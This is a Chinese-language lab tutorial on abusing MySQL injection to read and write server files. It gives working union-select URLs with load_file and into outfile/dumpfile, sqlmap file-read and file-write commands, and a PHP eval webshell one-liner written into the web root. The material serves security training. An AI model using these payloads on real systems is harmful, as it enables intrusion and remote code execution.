前提
读写文件受到权限影响,权限是:secure_file_priv,权限的位置在数据库的配置文件my.ini中:
数据库中通过(SHOW variables like ‘%secure%’;)命令查看配置。
1.secure_file_priv= 代表对文件读写没有限制
2.secure_file_priv=NULL 代表不能进行文件读写
3.secure_file_priv=d:/phpstudy/mysql 代表只能对该路径下文件进行读写
实现
读文件:
手工
load_file()
例如:
http://10.1.8.8/sql1/Less-1/?id=-1’union select 1,load_file(“C:\\phpStudy\\WWW\\ceshi.txt”),3 –+
例如,靶机上有一个ceshi.txt的文件:
成功读取文件内容:
sqlmap
–file-read
sqlmap -u http://10.1.8.8/sql1/Less-1/?id=1 –file-read “C:\phpStudy\WWW\ceshi.txt”
写文件:
手工
into outfile()
http://10.1.8.8/sql1/Less-1/?id=-1′ union select 1,”<?php eval($_POST[‘m’]);?>”,3 into outfile “C:\\phpStudy\\WWW\\ceshi.php” –+
虽然执行报错,但是文件是成功写入的:
靶机上已成功写入ceshi.php一句话:
into dumpfile()写二进制文件使用
同样也能成功写入:
http://10.1.8.8/sql1/Less-1/?id=-1′ union select 1,”<?php eval($_POST[‘m’]);?>”,3 into dumpfile “C:\\phpStudy\\WWW\\ceshi2.php” –+
Sqlmap
–file-write 本地文件 –file-dest 目的文件
sqlmap -u http://10.1.8.8/sql1/Less-1/?id=1 –file-write “C:\Users\CISP-PTE\Desktop\xie1.php” –file-dest “C:\phpStudy\WWW\xie.php”
操作机:
靶机上,文件已经写入:
当然,SQL注入写入webshell的方式还有其他的方法,这里列举的只是比较简单的方法,关键是,需要具体相应的权限,并且知道网站的绝对路径。
参考
https://www.cnblogs.com/insane-Mr-Li/p/10150165.html